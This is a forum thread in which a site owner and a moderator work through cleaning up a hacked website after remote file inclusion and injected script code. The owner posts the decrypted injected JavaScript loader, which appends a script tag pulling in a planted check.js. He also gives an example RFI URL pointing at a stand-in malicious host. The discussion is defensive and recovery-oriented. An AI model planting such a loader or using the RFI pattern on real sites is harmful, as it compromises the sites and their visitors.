| Author |
Message |
evaders99
Moderator
Joined: Apr 30, 2004
Posts: 2846
|
 Posted:
Sat Mar 08, 2008 1:55 am |
 
|
Yep, looks like standard remote file inclusions. The code he puts would seem to block them
Did you still have questions? You seem to be getting the hang of this |
|
|
 
|
|
Nash
Regular
Joined: Jan 10, 2006
Posts: 86
|
| Posted:
Sat Mar 08, 2008 9:46 am |
|
Getting there bit by bit. Still do have questions, but I will spend some more time today going through and compile a short list of them.
I found that a ton of my .jss and .css files had the Exhibit A code appended to them, so I manually went through and removed those occurences.
I still see my site being crawled with a lot of GET commands in a row, which leads me to believe the walkdir is still being executed. This leads me to believe that somehow that code is either on my server, or being executed via a hole somewhere (e.g., eastcoastbodyboarding.com/index.php?file=http://www.badsite.com/badfile.php). Does that sound right?
How would you go about locating what is causing my directories to be walked. I added that bit of code to my .htaccess to stop http: from being passed into URLs. I think though that certain directories have their own htaccess's so I will need to modify them still as well. |
|
|
|
|
|
evaders99
Moderator
Joined: Apr 30, 2004
Posts: 2846
|
| Posted:
Sat Mar 08, 2008 4:28 pm |
|
| Quote: |
somehow that code is either on my server, or being executed via a hole somewhere
|
A pretty good possibility. You may have to ask your host about it if you don't have root access to your server. There may be some process that the hackers has running in memory.
.htaccess applies to all subdirectories unless it has its own .htaccess file.
So the one .htaccess in the root directory should protect all subdirectories |
|
|
|
|
|
Nash
Regular
Joined: Jan 10, 2006
Posts: 86
|
| Posted:
Sat Mar 08, 2008 7:22 pm |
|
thanks for the reply. yeah, the b*strd seems to have copied some of my htaccess files. would be easy enough to clean, but some of the other installs I have (like os commerce and ibf) have their own htaccesses in subdirectories. Will just have to get them all. I sort of suspect that the hacker originally got in through the deprecated OScommerce and Openads folders I had on my account. I wasn't using them anymore and naively thought that if they weren't linked to anything, no one would see them. |
|
|
|
|
|
Nash
Regular
Joined: Jan 10, 2006
Posts: 86
|
| Posted:
Sat Mar 08, 2008 8:03 pm |
|
This is the decrypted version of Exhibit A, by the way:
| Code: |
'if (!document.getElementById('JSSS'))
{
JSS1 = 54;
JSS2 = 152567;
JSS3 = '/osc/images/apebu/dummy.htm';
var js = document.createElement('script');
js.setAttribute('src', '/osc/images/apebu/check.js');
js.setAttribute('id', 'JSSS');
document.getElementsByTagName('head').item(0).appendChild(js) };'
|
|
|
|
|
|
|
Nash
Regular
Joined: Jan 10, 2006
Posts: 86
|
| Posted:
Mon Mar 17, 2008 8:01 am |
|
Interesting. Looking at the malcode some more, it's actually re-writing the modification date and time of the file so that it does not show up as newly modified. |
|
|
|
|
|
|
|
|
|
![[Valid RSS]](http://ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
:: 
::
